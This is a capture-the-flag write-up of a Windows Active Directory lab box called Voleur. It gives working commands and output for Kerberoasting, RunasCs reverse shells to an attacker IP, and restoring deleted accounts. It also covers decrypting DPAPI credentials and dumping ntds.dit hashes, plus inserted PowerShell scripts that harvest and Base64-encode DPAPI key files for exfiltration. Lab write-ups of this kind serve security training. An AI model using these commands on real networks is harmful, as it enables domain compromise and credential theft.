Voleur starts with credentials, but an nmap scan shows that NTLM is disabled, so every tool has to authenticate over Kerberos. With a Kerberos ticket we collect a BloodHound dump. The IT share holds a password-protected xlsx file; we convert it to a hash and crack it. The spreadsheet lists users and passwords, and one of the users has been deleted. The svc_ldap password from the spreadsheet gives us WriteSPN over svc_winrm, so we set an SPN, Kerberoast svc_winrm and get a WinRM shell. From there we move laterally to svc_ldap, find the deleted user, restore the account with PowerShell and get a shell using the password from the spreadsheet. In the next IT subdirectory we find an archived user profile holding DPAPI master keys and credential blobs; decrypting them gives another user's password. That user can read a backup in the Third-Line directory containing the SYSTEM and SECURITY hives and ntds.dit, which we use to dump the Administrator hash.

As is common in real-world Windows pentests, the Voleur box starts with credentials for the following account: ryan.naylor / HollowOct31Nyt

Initial Nmap

PORT     STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-08-19 09:21:15Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
2222/tcp open ssh syn-ack ttl 127 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| ssh-rsa <SNIP>
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMkGDGeRmex5q16ficLqbT7FFvQJxdJZsJ01vdVjKBXfMIC/oAcLPRUwu5yBZeQoOvWF8yIVDN/FJPeqjT9cgxg=
| 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILv295drVe3lopPEgZsjMzOVlk4qZZfFz1+EjXGebLCR
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 48495/tcp): CLEAN (Timeout)
| Check 2 (port 27736/tcp): CLEAN (Timeout)
| Check 3 (port 60782/udp): CLEAN (Timeout)
| Check 4 (port 36910/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-08-19T09:21:18
|_ start_date: N/A
|_clock-skew: 59m59s

Since this is a Windows domain, we start with standard AD enumeration. Two things in the scan matter for everything that follows: nxc reports NTLM:False (so every tool must use Kerberos), and the clock skew of 59m59s is far beyond the 5-minute tolerance Kerberos allows, so the attacker clock must be synced to the DC before any ticket request will succeed.

LDAP

With credentials we can collect a BloodHound dump. Because NTLM is disabled, we first request a TGT for ryan.naylor and point the tools at the resulting ccache (the -k / --use-kcache flags below); the nxc output confirms the login came "from ccache".

konoha# bloodhound-python -d voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -ns 10.10.11.76 --zip -c Group,LocalAdmin,Session,Trusts,DCOM,RDP,PSRemote,LoggedOn,Container,ObjectProps,ACL --disable-autogc --dns-timeout 20 -dc DC.voleur.htb -k -no-pass

Checking the user descriptions for any juicy details.

konoha# nxc ldap DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --use-kcache -M get-desc-users
LDAP DC.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb)
LDAP DC.voleur.htb 389 DC [+] voleur.htb\ryan.naylor from ccache
GET-DESC... DC.voleur.htb 389 DC [+] Found following users:
GET-DESC... DC.voleur.htb 389 DC User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... DC.voleur.htb 389 DC User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... DC.voleur.htb 389 DC User: krbtgt description: Key Distribution Center Service Account
GET-DESC... DC.voleur.htb 389 DC User: ryan.naylor description: First-Line Support Technician
GET-DESC... DC.voleur.htb 389 DC User: marie.bryant description: First-Line Support Technician
GET-DESC... DC.voleur.htb 389 DC User: lacey.miller description: Second-Line Support Technician
GET-DESC... DC.voleur.htb 389 DC User: jeremy.combs description: Third-Line Support Technician

BloodHound also shows a few custom groups; we note these and come back to them later.

  • Restore_Users
  • First-Line Support Technicians
  • FIrst-Line Technicians

SMB

Let’s check out what shares we have available to us.

konoha# nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --shares
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] VOLEUR.HTB\ryan.naylor from ccache
SMB DC.voleur.htb 445 DC [*] Enumerated shares
SMB DC.voleur.htb 445 DC Share Permissions Remark
SMB DC.voleur.htb 445 DC ----- ----------- ------
SMB DC.voleur.htb 445 DC ADMIN$ Remote Admin
SMB DC.voleur.htb 445 DC C$ Default share
SMB DC.voleur.htb 445 DC Finance
SMB DC.voleur.htb 445 DC HR
SMB DC.voleur.htb 445 DC IPC$ READ Remote IPC
SMB DC.voleur.htb 445 DC IT READ
SMB DC.voleur.htb 445 DC NETLOGON READ Logon server share
SMB DC.voleur.htb 445 DC SYSVOL READ Logon server share

Connecting to the IT share via SMB (Kerberos again, using the ticket in the ccache).

konoha# impacket-smbclient 'voleur.htb/ryan.naylor@DC.voleur.htb' -k -no-pass -dc-ip 10.10.11.76
<SNIP>
# ls
drw-rw-rw- 0 Wed Jan 29 03:40:17 2025 .
drw-rw-rw- 0 Wed Jan 29 03:10:01 2025 ..
-rw-rw-rw- 16896 Thu May 29 17:23:36 2025 Access_Review.xlsx
# mget *

From the IT share we get Access_Review.xlsx, which is password-protected. office2john converts it into a hash we can crack with john.

konoha# office2john Access_Review.xlsx > access.hash
konoha# john --wordlist=/usr/share/wordlists/rockyou.txt access.hash
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 128/128 AVX 4x / SHA512 128/128 AVX 2x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<SNIP> (Access_Review.xlsx)

After cracking the password and opening the spreadsheet, we have several usernames and passwords, and one user is marked as deleted (possibly restorable; we will come back to that).

Looking at svc_ldap, whose password is in the spreadsheet, BloodHound shows it has WriteSPN over svc_winrm. Writing an SPN onto svc_winrm with bloodyAD makes that account Kerberoastable, so we can request its service ticket with GetUserSPNs (a targeted Kerberoast). Both commands authenticate with a Kerberos ticket for svc_ldap, so request a TGT for that account first. Once the hash is captured, remove the SPN again so the change is not left behind.

konoha# bloodyAD -v DEBUG -d voleur.htb -u svc_ldap  -k --dc-ip 10.10.11.76 --host DC.voleur.htb set object svc_winrm servicePrincipalName -v HOST/svc_winrm

konoha# impacket-GetUserSPNs -dc-ip 10.10.11.76 'voleur.htb/svc_ldap' -request-user svc_winrm -k -no-pass -outputfile svc_winrm

The svc_winrm hash cracks; with its password we request a TGT for svc_winrm and get a WinRM shell on the box (Evil-WinRM with Kerberos, since NTLM is off).

On Box

As svc_winrm, we use RunasCs.exe (renamed RCs.exe here) with svc_ldap's password from the spreadsheet to spawn a reverse shell as svc_ldap.

*Evil-WinRM* PS C:\programdata> .\RCs.exe svc_ldap M1XyC9pW7qT5Vn powershell -r 10.10.14.2:443 -t 0
[*] Warning: The logon for user 'svc_ldap' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-2d33258$\Default
[+] Async process 'C:\ProgramData\ms.exe' with pid 2796 created in background.

As svc_ldap, we search for deleted objects with the ActiveDirectory PowerShell module. Deleted objects only show up with -IncludeDeletedObjects, and lastKnownParent tells us where the account lived before it was deleted.

PS C:\Windows\system32> Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects -Properties objectSid, lastKnownParent, ObjectGUID | Select-Object Name, ObjectGUID, objectSid, lastKnownParent | Format-List


Name : Todd Wolfe
DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
ObjectGUID : 1c6b1deb-c372-4cbb-87b1-15031de169db
objectSid : S-1-5-21-3927696377-1337352550-2781715495-1110
lastKnownParent : OU=Second-Line Support Technicians,DC=voleur,DC=htb

Then restore the object (the user) by its ObjectGUID, placing it back into its last known parent OU.

PS C:\Windows\system32> Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db -TargetPath "OU=Second-Line Support Technicians,DC=voleur,DC=htb"
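As an added example (not from the original write-up), here is the restore procedure above carried through in PowerShell with the checks a practitioner wants: confirm the AD Recycle Bin is enabled, list every deleted user with its last known parent, restore one by GUID and verify the account came back with its SID, group memberships and password intact. The "Todd Wolfe" name comes from the write-up; everything else (module availability on the host, the caller holding the Reanimate Tombstones right) is an assumption.

```powershell
# Added example, not from the original write-up.
# Assumes: the ActiveDirectory module is present (it is on a DC) and the caller
# has the Reanimate Tombstones right on the domain partition.
Import-Module ActiveDirectory

# Restore-ADObject only fully restores an object when the AD Recycle Bin is
# enabled. Without it, a "deleted" object is a stripped tombstone and most
# attributes (including the password hash) are already gone.
$rb = Get-ADOptionalFeature -Filter 'Name -like "Recycle Bin Feature"'
if (-not $rb.EnabledScopes) {
    Write-Warning 'AD Recycle Bin is not enabled; deleted users cannot be fully restored.'
}

# Enumerate deleted user objects. isDeleted objects are hidden from normal
# searches, hence -IncludeDeletedObjects.
$deleted = Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' `
    -IncludeDeletedObjects `
    -Properties sAMAccountName, objectSid, lastKnownParent, whenChanged
$deleted |
    Select-Object Name, ObjectGUID, sAMAccountName, objectSid, lastKnownParent, whenChanged |
    Format-List

# Pick the target. The Name of a deleted object is "<CN>\nDEL:<GUID>", so match
# on the prefix rather than the whole string.
$target = $deleted | Where-Object { $_.Name.StartsWith('Todd Wolfe') } | Select-Object -First 1

if ($target) {
    # -TargetPath is optional, but passing it explicitly avoids the failure
    # mode where lastKnownParent was itself deleted and the restore errors out.
    Restore-ADObject -Identity $target -TargetPath $target.lastKnownParent

    # Verify. A Recycle Bin restore keeps the original SID, group memberships
    # and unicodePwd, which is why a password found in old documentation
    # (the spreadsheet here) still works without a reset.
    Get-ADUser -Identity $target.ObjectGUID.ToString() `
        -Properties Enabled, MemberOf, PasswordLastSet, SID |
        Select-Object SamAccountName, SID, Enabled, PasswordLastSet, MemberOf
}
```

If the account comes back with Enabled set to False it was disabled before deletion and needs Enable-ADAccount before the known password is of any use; on this box it was not.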

We can now get a shell as todd.wolfe the same way as before, using the password for that account from the spreadsheet.

*Evil-WinRM* PS C:\programdata> .\RCs.exe todd.wolfe NightT1meP1dg3on14 powershell -r 10.10.14.2:443 -t 0
[*] Warning: The logon for user 'todd.wolfe' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-e18972$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5340 created in background.

DPAPI AGAIN, Where in a home directory duh!!

With a shell as todd.wolfe, we look at the IT directory at the root of C:, which has First-Line, Second-Line and Third-Line support subdirectories. Inside Second-Line there is an Archived directory containing a Users directory, and todd.wolfe's old profile in it is readable by us. From that profile we gather what DPAPI needs: the user's master key file (normally under AppData\Roaming\Microsoft\Protect\<SID>\<GUID>) and the Credential Manager blob (normally under AppData\Roaming\Microsoft\Credentials). The master key is encrypted with the user's password, which we already have, and the credential blob is encrypted with the master key.

Exfiltrating the key files over SMB didn't work, so they were Base64-encoded on the box and decoded back to binary on the attacker machine.
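The collection step above, as an added example that is not part of the original write-up: a PowerShell script that walks a profile directory for DPAPI master keys and Credential Manager blobs and prints each one Base64-encoded together with its owning SID, for the case where file transfer fails and only a text channel is available. The $ProfileRoot default is an assumed path (the write-up does not give the full path of the archived profile); the AppData locations are the standard DPAPI ones.

```powershell
# Added example, not from the original write-up.
# $ProfileRoot is an ASSUMED path; point it at the archived profile you found.
param(
    [string]$ProfileRoot = 'C:\IT\Second-Line Support\Archived Users\todd.wolfe'
)

# Standard DPAPI locations inside a user profile. Master keys live in
# Protect\<SID>\<GUID>; Credential Manager blobs live in Roaming and Local
# Credentials. All of these are hidden+system files, hence -Force below.
$paths = @(
    (Join-Path $ProfileRoot 'AppData\Roaming\Microsoft\Protect'),
    (Join-Path $ProfileRoot 'AppData\Roaming\Microsoft\Credentials'),
    (Join-Path $ProfileRoot 'AppData\Local\Microsoft\Credentials')
)

$guidName = '^[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$'   # master key files
$blobName = '^[0-9A-F]{32}$'                                # credential blobs

$found = foreach ($p in $paths) {
    if (-not (Test-Path -LiteralPath $p)) { continue }
    Get-ChildItem -LiteralPath $p -Recurse -Force -File |
        # Skip the "Preferred" marker and BK-* backup-key files; only the
        # GUID-named master keys and 32-hex-character blobs are useful.
        Where-Object { $_.Name -match $guidName -or $_.Name -match $blobName }
}

if (-not $found) {
    Write-Warning "No DPAPI material found under $ProfileRoot"
}

foreach ($f in $found) {
    # For a master key the parent directory name is the owning SID, which
    # impacket-dpapi needs (-sid) together with the user's password.
    $b64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes($f.FullName))
    '{0}|{1}|{2}' -f $f.Directory.Name, $f.Name, $b64
}
```

Copy each output line to the attacker machine and decode the third field with base64 -d into a file named after the second field. For master keys the first field is the SID; it must match the user's objectSid (ending in 1110 for todd.wolfe in the Get-ADObject output above), otherwise impacket-dpapi derives the wrong key and the decryption silently fails.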

konoha# impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password 'NightT1meP1dg3on14'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version : 2 (2)
Guid : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
konoha# impacket-dpapi credential -f 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19+00:00
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m

With jeremy.combs's password recovered from the credential blob, we get a shell the same way as before.

*Evil-WinRM* PS C:\programdata> .\RCs.exe jeremy.combs qT3V9pLXyN7W4m powershell -r 10.10.14.2:443 -t 0
[*] Warning: The logon for user 'jeremy.combs' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-e18972$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 3564 created in background.

Backing it up

Going back into IT as jeremy.combs, we can now read the Third-Line directory. It contains a backup with the SECURITY and SYSTEM registry hives, and an Active Directory folder holding ntds.dit. With all three transferred to our machine, secretsdump decrypts the database offline: the SYSTEM hive yields the boot key, which unlocks LSA secrets in SECURITY and the PEK in ntds.dit, which in turn decrypts the domain hashes. Because NTLM is disabled on this domain, the Administrator NT hash cannot simply be passed over SMB or WinRM; instead it is used to request a Kerberos TGT (overpass-the-hash) and that ticket is used for the final login.

konoha# impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:759d6c7b27b4c7c4feda8909bc656985b457ea8d7cee9e0be67971bcb648008804103df46ed40750e8d3be1a84b89be42a27e7c0e2d0f6437f8b3044e840735f37ba5359abae5fca8fe78959b667cd5a68f2a569b657ee43f9931e2fff61f9a6f2e239e384ec65e9e64e72c503bd86371ac800eb66d67f1bed955b3cf4fe7c46fca764fb98f5be358b62a9b02057f0eb5a17c1d67170dda9514d11f065accac76de1ccdb1dae5ead8aa58c639b69217c4287f3228a746b4e8fd56aea32e2e8172fbc19d2c8d8b16fc56b469d7b7b94db5cc967b9ea9d76cc7883ff2c854f76918562baacad873958a7964082c58287e2
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77
[*] DPAPI_SYSTEM
dpapi_machinekey:0x5d117895b83add68c59c7c48bb6db5923519f436
dpapi_userkey:0xdce451c1fdc323ee07272945e3e0013d5a07d1c3
[*] NL$KM
0000 06 6A DC 3B AE F7 34 91 73 0F 6C E0 55 FE A3 FF .j.;..4.s.l.U...
0010 30 31 90 0A E7 C6 12 01 08 5A D0 1E A5 BB D2 37 01.......Z.....7
0020 61 C3 FA 0D AF C9 94 4A 01 75 53 04 46 66 0A AC a......J.uS.Ff..
0030 D8 99 1F D3 BE 53 0C CF 6E 2A 4E 74 F2 E9 F2 EB .....S..n*Nt....
NL$KM:066adc3baef73491730f6ce055fea3ff3031900ae7c61201085ad01ea5bbd23761c3fa0dafc9944a0175530446660aacd8991fd3be530ccf6e2a4e74f2e9f2eb
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>